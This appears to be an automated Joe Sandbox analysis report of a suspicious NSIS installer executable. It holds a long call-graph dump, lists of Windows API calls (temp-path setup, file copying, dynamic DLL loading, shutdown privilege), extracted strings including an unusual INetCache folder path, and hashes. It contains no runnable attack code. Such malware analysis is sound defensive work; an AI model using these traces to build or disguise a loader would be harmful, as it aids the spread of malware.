703d1ad2 GlobalFree GlobalFree 5531->5532 5533 402821 5534 402827 5533->5534 5535 402ac5 5534->5535 5536 40282f FindClose 5534->5536 5536->5535 4186 4015a3 4187 402c41 17 API calls 4186->4187 4188 4015aa SetFileAttributesW 4187->4188 4189 4015bc 4188->4189 5537 703d1058 5539 703d1074 5537->5539 5538 703d10dd 5539->5538 5540 703d1516 GlobalFree 5539->5540 5541 703d1092 5539->5541 
5540->5541 5542 703d1516 GlobalFree 5541->5542 5543 703d10a2 5542->5543 5544 703d10a9 GlobalSize 5543->5544 5545 703d10b2 5543->5545 5544->5545 5546 703d10c7 5545->5546 5547 703d10b6 GlobalAlloc 5545->5547 5549 703d10d2 GlobalFree 5546->5549 5548 703d153d 3 API calls 5547->5548 5548->5546 5549->5538 5550 703d16d8 5551 703d1707 5550->5551 5552 703d1b63 22 API calls 5551->5552 5553 703d170e 5552->5553 5554 703d1715 5553->5554 5555 703d1721 5553->5555 5556 703d1272 2 API calls 5554->5556 5557 703d1748 5555->5557 5558 703d172b 5555->5558 5561 703d171f 5556->5561 5559 703d174e 5557->5559 5560 703d1772 5557->5560 5562 703d153d 3 API calls 5558->5562 5563 703d15b4 3 API calls 5559->5563 5564 703d153d 3 API calls 5560->5564 5565 703d1730 5562->5565 5567 703d1753 5563->5567 5564->5561 5566 703d15b4 3 API calls 5565->5566 5568 703d1736 5566->5568 5569 703d1272 2 API calls 5567->5569 5570 703d1272 2 API calls 5568->5570 5571 703d1759 GlobalFree 5569->5571 5572 703d173c GlobalFree 5570->5572 5571->5561 5573 703d176d GlobalFree 5571->5573 5572->5561 5573->5561 5574 4029a7 5575 4029aa 5574->5575 5576 4029d5 5575->5576 5577 4029ee 5575->5577 5581 40288b 5575->5581 5578 4029da 5576->5578 5586 4029eb 5576->5586 5579 402a08 5577->5579 5580 4029f8 5577->5580 5587 406297 lstrcpynW 5578->5587 5583 4062b9 17 API calls 5579->5583 5582 402c1f 17 API calls 5580->5582 5582->5586 5583->5586 5586->5581 5588 4061de wsprintfW 5586->5588 5587->5581 5588->5581 5589 401a30 5590 402c41 17 API calls 5589->5590 5591 401a39 ExpandEnvironmentStringsW 5590->5591 5592 401a4d 5591->5592 5594 401a60 5591->5594 5593 401a52 lstrcmpW 5592->5593 5592->5594 5593->5594 4575 402032 4576 402044 4575->4576 4586 4020f6 4575->4586 4577 402c41 17 API calls 4576->4577 4579 40204b 4577->4579 4578 401423 24 API calls 4580 402250 4578->4580 4581 402c41 17 API calls 4579->4581 4582 402054 4581->4582 4583 40206a LoadLibraryExW 4582->4583 4584 40205c GetModuleHandleW 4582->4584 4585 40207b 4583->4585 4583->4586 4584->4583 
4584->4585 4598 4066e0 WideCharToMultiByte 4585->4598 4586->4578 4589 4020c5 4593 4052ff 24 API calls 4589->4593 4590 40208c 4591 402094 4590->4591 4592 4020ab 4590->4592 4594 401423 24 API calls 4591->4594 4601 703d177b 4592->4601 4595 40209c 4593->4595 4594->4595 4595->4580 4596 4020e8 FreeLibrary 4595->4596 4596->4580 4599 40670a GetProcAddress 4598->4599 4600 402086 4598->4600 4599->4600 4600->4589 4600->4590 4602 703d17ae 4601->4602 4643 703d1b63 4602->4643 4604 703d17b5 4605 703d18da 4604->4605 4606 703d17cd 4604->4606 4607 703d17c6 4604->4607 4605->4595 4677 703d2398 4606->4677 4693 703d2356 4607->4693 4612 703d1831 4616 703d1837 4612->4616 4617 703d1882 4612->4617 4613 703d1813 4706 703d256d 4613->4706 4614 703d17fc 4628 703d17f2 4614->4628 4703 703d2d2f 4614->4703 4615 703d17e3 4623 703d17e9 4615->4623 4624 703d17f4 4615->4624 4725 703d15c6 4616->4725 4621 703d256d 10 API calls 4617->4621 4629 703d1873 4621->4629 4622 703d1819 4717 703d15b4 4622->4717 4623->4628 4687 703d2a74 4623->4687 4697 703d2728 4624->4697 4628->4612 4628->4613 4634 703d18c9 4629->4634 4732 703d2530 4629->4732 4631 703d17fa 4631->4628 4632 703d256d 10 API calls 4632->4629 4634->4605 4636 703d18d3 GlobalFree 4634->4636 4636->4605 4640 703d18b5 4640->4634 4736 703d153d wsprintfW 4640->4736 4642 703d18ae FreeLibrary 4642->4640 4739 703d121b GlobalAlloc 4643->4739 4645 703d1b87 4740 703d121b GlobalAlloc 4645->4740 4647 703d1dad GlobalFree GlobalFree GlobalFree 4648 703d1dca 4647->4648 4665 703d1e14 4647->4665 4650 703d2196 4648->4650 4657 703d1ddf 4648->4657 4648->4665 4649 703d1c68 GlobalAlloc 4664 703d1b92 4649->4664 4651 703d21b8 GetModuleHandleW 4650->4651 4650->4665 4654 703d21de 4651->4654 4655 703d21c9 LoadLibraryW 4651->4655 4652 703d1cb3 lstrcpyW 4656 703d1cbd lstrcpyW 4652->4656 4653 703d1cd1 GlobalFree 4653->4664 4747 703d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4654->4747 4655->4654 4655->4665 4656->4664 4657->4665 4743 703d122c 
4657->4743 4659 703d2230 4662 703d223d lstrlenW 4659->4662 4659->4665 4661 703d21f0 4661->4659 4674 703d221a GetProcAddress 4661->4674 4748 703d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4662->4748 4663 703d2068 4746 703d121b GlobalAlloc 4663->4746 4664->4647 4664->4649 4664->4652 4664->4653 4664->4656 4664->4663 4664->4665 4667 703d20f0 4664->4667 4669 703d1fa9 GlobalFree 4664->4669 4671 703d122c 2 API calls 4664->4671 4675 703d1d0f 4664->4675 4665->4604 4667->4665 4670 703d2138 lstrcpyW 4667->4670 4669->4664 4670->4665 4671->4664 4673 703d2257 4673->4665 4674->4659 4675->4664 4741 703d158f GlobalSize GlobalAlloc 4675->4741 4676 703d2071 4676->4604 4678 703d23b0 4677->4678 4680 703d24d9 GlobalFree 4678->4680 4682 703d2458 GlobalAlloc WideCharToMultiByte 4678->4682 4683 703d2483 GlobalAlloc 4678->4683 4684 703d122c GlobalAlloc lstrcpynW 4678->4684 4685 703d249a 4678->4685 4750 703d12ba 4678->4750 4680->4678 4681 703d17d3 4680->4681 4681->4614 4681->4615 4681->4628 4682->4680 4683->4685 4684->4678 4685->4680 4754 703d26bc 4685->4754 4689 703d2a86 4687->4689 4688 703d2b2b ReadFile 4690 703d2b49 4688->4690 4689->4688 4691 703d2c3a GetLastError 4690->4691 4692 703d2c45 4690->4692 4691->4692 4692->4628 4694 703d236b 4693->4694 4695 703d17cc 4694->4695 4696 703d2376 GlobalAlloc 4694->4696 4695->4606 4696->4694 4701 703d2758 4697->4701 4698 703d2806 4700 703d280c GlobalSize 4698->4700 4702 703d2816 4698->4702 4699 703d27f3 GlobalAlloc 4699->4702 4700->4702 4701->4698 4701->4699 4702->4631 4704 703d2d3a 4703->4704 4705 703d2d7a GlobalFree 4704->4705 4757 703d121b GlobalAlloc 4706->4757 4708 703d25f0 MultiByteToWideChar 4713 703d2577 4708->4713 4709 703d2623 lstrcpynW 4709->4713 4710 703d2612 StringFromGUID2 4710->4713 4711 703d2636 wsprintfW 4711->4713 4712 703d265a GlobalFree 4712->4713 4713->4708 4713->4709 4713->4710 4713->4711 4713->4712 4714 703d268f GlobalFree 4713->4714 4715 703d1272 2 API calls 4713->4715 4758 703d12e1 
4713->4758 4714->4622 4715->4713 4762 703d121b GlobalAlloc 4717->4762 4719 703d15b9 4720 703d15c6 2 API calls 4719->4720 4721 703d15c3 4720->4721 4722 703d1272 4721->4722 4723 703d127b GlobalAlloc lstrcpynW 4722->4723 4724 703d12b5 GlobalFree 4722->4724 4723->4724 4724->4629 4726 703d15e4 4725->4726 4727 703d15d6 lstrcpyW 4725->4727 4726->4727 4729 703d15f0 4726->4729 4730 703d161d 4727->4730 4729->4730 4731 703d160d wsprintfW 4729->4731 4730->4632 4731->4730 4733 703d253e 4732->4733 4735 703d1895 4732->4735 4734 703d255a GlobalFree 4733->4734 4733->4735 4734->4733 4735->4640 4735->4642 4737 703d1272 2 API calls 4736->4737 4738 703d155e 4737->4738 4738->4634 4739->4645 4740->4664 4742 703d15ad 4741->4742 4742->4675 4749 703d121b GlobalAlloc 4743->4749 4745 703d123b lstrcpynW 4745->4665 4746->4676 4747->4661 4748->4673 4749->4745 4751 703d12c1 4750->4751 4752 703d122c 2 API calls 4751->4752 4753 703d12df 4752->4753 4753->4678 4755 703d26ca VirtualAlloc 4754->4755 4756 703d2720 4754->4756 4755->4756 4756->4685 4757->4713 4759 703d130c 4758->4759 4760 703d12ea 4758->4760 4759->4713 4760->4759 4761 703d12f0 lstrcpyW 4760->4761 4761->4759 4762->4719 5595 703d2c4f 5596 703d2c67 5595->5596 5597 703d158f 2 API calls 5596->5597 5598 703d2c82 5597->5598 4794 403d35 4795 403e88 4794->4795 4796 403d4d 4794->4796 4797 403ed9 4795->4797 4798 403e99 GetDlgItem GetDlgItem 4795->4798 4796->4795 4799 403d59 4796->4799 4801 403f33 4797->4801 4811 401389 2 API calls 4797->4811 4800 40420e 18 API calls 4798->4800 4802 403d64 SetWindowPos 4799->4802 4803 403d77 4799->4803 4806 403ec3 SetClassLongW 4800->4806 4807 40425a SendMessageW 4801->4807 4857 403e83 4801->4857 4802->4803 4804 403d94 4803->4804 4805 403d7c ShowWindow 4803->4805 4808 403db6 4804->4808 4809 403d9c DestroyWindow 4804->4809 4805->4804 4810 40140b 2 API calls 4806->4810 4855 403f45 4807->4855 4812 403dbb SetWindowLongW 4808->4812 4813 403dcc 4808->4813 4816 4041b8 4809->4816 4810->4797 4814 403f0b 4811->4814 4812->4857 
4818 403e75 4813->4818 4819 403dd8 GetDlgItem 4813->4819 4814->4801 4820 403f0f SendMessageW 4814->4820 4815 40140b 2 API calls 4815->4855 4821 4041c8 ShowWindow 4816->4821 4816->4857 4817 404199 DestroyWindow EndDialog 4817->4816 4875 404275 4818->4875 4822 403e08 4819->4822 4823 403deb SendMessageW IsWindowEnabled 4819->4823 4820->4857 4821->4857 4826 403e15 4822->4826 4829 403e5c SendMessageW 4822->4829 4830 403e28 4822->4830 4836 403e0d 4822->4836 4823->4822 4823->4857 4825 4062b9 17 API calls 4825->4855 4826->4829 4826->4836 4828 40420e 18 API calls 4828->4855 4829->4818 4831 403e30 4830->4831 4832 403e45 4830->4832 4834 40140b 2 API calls 4831->4834 4835 40140b 2 API calls 4832->4835 4833 403e43 4833->4818 4834->4836 4837 403e4c 4835->4837 4872 4041e7 4836->4872 4837->4818 4837->4836 4839 403fc0 GetDlgItem 4840 403fd5 4839->4840 4841 403fdd ShowWindow KiUserCallbackDispatcher 4839->4841 4840->4841 4869 404230 EnableWindow 4841->4869 4843 404007 EnableWindow 4848 40401b 4843->4848 4844 404020 GetSystemMenu EnableMenuItem SendMessageW 4845 404050 SendMessageW 4844->4845 4844->4848 4845->4848 4847 403d16 18 API calls 4847->4848 4848->4844 4848->4847 4870 404243 SendMessageW 4848->4870 4871 406297 lstrcpynW 4848->4871 4850 40407f lstrlenW 4851 4062b9 17 API calls 4850->4851 4852 404095 SetWindowTextW 4851->4852 4853 401389 2 API calls 4852->4853 4853->4855 4854 4040d9 DestroyWindow 4854->4816 4856 4040f3 CreateDialogParamW 4854->4856 4855->4815 4855->4817 4855->4825 4855->4828 4855->4854 4855->4857 4866 40420e 4855->4866 4856->4816 4858 404126 4856->4858 4859 40420e 18 API calls 4858->4859 4860 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4859->4860 4861 401389 2 API calls 4860->4861 4862 404177 4861->4862 4862->4857 4863 40417f ShowWindow 4862->4863 4864 40425a SendMessageW 4863->4864 4865 404197 4864->4865 4865->4816 4867 4062b9 17 API calls 4866->4867 4868 404219 SetDlgItemTextW 4867->4868 4868->4839 4869->4843 4870->4848 4871->4850 4873 4041f4 
SendMessageW 4872->4873 4874 4041ee 4872->4874 4873->4833 4874->4873 4876 404338 4875->4876 4877 40428d GetWindowLongW 4875->4877 4876->4857 4877->4876 4878 4042a2 4877->4878 4878->4876 4879 4042d2 4878->4879 4880 4042cf GetSysColor 4878->4880 4881 4042e2 SetBkMode 4879->4881 4882 4042d8 SetTextColor 4879->4882 4880->4879 4883 404300 4881->4883 4884 4042fa GetSysColor 4881->4884 4882->4881 4885 404311 4883->4885 4886 404307 SetBkColor 4883->4886 4884->4883 4885->4876 4887 404324 DeleteObject 4885->4887 4888 40432b CreateBrushIndirect 4885->4888 4886->4885 4887->4888 4888->4876 5604 402a35 5605 402c1f 17 API calls 5604->5605 5606 402a3b 5605->5606 5607 40288b 5606->5607 5608 402a72 5606->5608 5610 402a4d 5606->5610 5608->5607 5609 4062b9 17 API calls 5608->5609 5609->5607 5610->5607 5612 4061de wsprintfW 5610->5612 5612->5607 5613 401735 5614 402c41 17 API calls 5613->5614 5615 40173c SearchPathW 5614->5615 5616 4029e6 5615->5616 5617 401757 5615->5617 5617->5616 5619 406297 lstrcpynW 5617->5619 5619->5616 5620 4014b8 5621 4014be 5620->5621 5622 401389 2 API calls 5621->5622 5623 4014c6 5622->5623 5624 4046b8 5625 4046c8 5624->5625 5626 4046ee 5624->5626 5627 40420e 18 API calls 5625->5627 5628 404275 8 API calls 5626->5628 5629 4046d5 SetDlgItemTextW 5627->5629 5630 4046fa 5628->5630 5629->5626 5631 401db9 GetDC 5632 402c1f 17 API calls 5631->5632 5633 401dcb GetDeviceCaps MulDiv ReleaseDC 5632->5633 5634 402c1f 17 API calls 5633->5634 5635 401dfc 5634->5635 5636 4062b9 17 API calls 5635->5636 5637 401e39 CreateFontIndirectW 5636->5637 5638 402592 5637->5638 5639 40283b 5640 402843 5639->5640 5641 402847 FindNextFileW 5640->5641 5642 402859 5640->5642 5641->5642 5644 4029e6 5642->5644 5645 406297 lstrcpynW 5642->5645 5645->5644 5646 40543e 5647 4055e8 5646->5647 5648 40545f GetDlgItem GetDlgItem GetDlgItem 5646->5648 5650 4055f1 GetDlgItem CreateThread CloseHandle 5647->5650 5651 405619 5647->5651 5691 404243 SendMessageW 5648->5691 5650->5651 5653 405644 
5651->5653 5654 405630 ShowWindow ShowWindow 5651->5654 5655 405669 5651->5655 5652 4054cf 5660 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5652->5660 5656 4056a4 5653->5656 5657 405658 5653->5657 5658 40567e ShowWindow 5653->5658 5693 404243 SendMessageW 5654->5693 5659 404275 8 API calls 5655->5659 5656->5655 5667 4056b2 SendMessageW 5656->5667 5662 4041e7 SendMessageW 5657->5662 5663 405690 5658->5663 5664 40569e 5658->5664 5672 405677 5659->5672 5665 405544 5660->5665 5666 405528 SendMessageW SendMessageW 5660->5666 5662->5655 5668 4052ff 24 API calls 5663->5668 5669 4041e7 SendMessageW 5664->5669 5670 405557 5665->5670 5671 405549 SendMessageW 5665->5671 5666->5665 5667->5672 5673 4056cb CreatePopupMenu 5667->5673 5668->5664 5669->5656 5675 40420e 18 API calls 5670->5675 5671->5670 5674 4062b9 17 API calls 5673->5674 5677 4056db AppendMenuW 5674->5677 5676 405567 5675->5676 5680 405570 ShowWindow 5676->5680 5681 4055a4 GetDlgItem SendMessageW 5676->5681 5678 4056f8 GetWindowRect 5677->5678 5679 40570b TrackPopupMenu 5677->5679 5678->5679 5679->5672 5682 405726 5679->5682 5683 405593 5680->5683 5684 405586 ShowWindow 5680->5684 5681->5672 5685 4055cb SendMessageW SendMessageW 5681->5685 5686 405742 SendMessageW 5682->5686 5692 404243 SendMessageW 5683->5692 5684->5683 5685->5672 5686->5686 5687 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5686->5687 5689 405784 SendMessageW 5687->5689 5689->5689 5690 4057ad GlobalUnlock SetClipboardData CloseClipboard 5689->5690 5690->5672 5691->5652 5692->5681 5693->5653 5694 402abe InvalidateRect 5695 402ac5 5694->5695

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE ref: 0040338F
• GetVersion.KERNEL32 ref: 00403395
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
• OleInitialize.OLE32(00000000), ref: 0040340C
• SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
• GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000020,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
• DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                      • ExitProcess.KERNEL32 ref: 00403701
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                      • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\yVVZdG2NJX.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037C4
                                                                      • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                      • ExitProcess.KERNEL32 ref: 004038A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yVVZdG2NJX.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 3441113951-2980922028
                                                                      • Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                      • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                      • Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                      • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                      • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                      • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                      • ShowWindow.USER32(00000000), ref: 0040525C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                      • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                      • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                      • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                      APIs
                                                                        • Part of subcall function 703D121B: GlobalAlloc.KERNELBASE(00000040,?,703D123B,?,703D12DF,00000019,703D11BE,-000000A0), ref: 703D1225
                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 703D1C6F
                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 703D1CB7
                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 703D1CC1
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1CD4
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DB6
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DBB
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1DC0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1FAA
                                                                      • lstrcpyW.KERNEL32(?,?), ref: 703D2144
                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 703D21B9
                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 703D21CA
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 703D2224
                                                                      • lstrlenW.KERNEL32(00000808), ref: 703D223E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
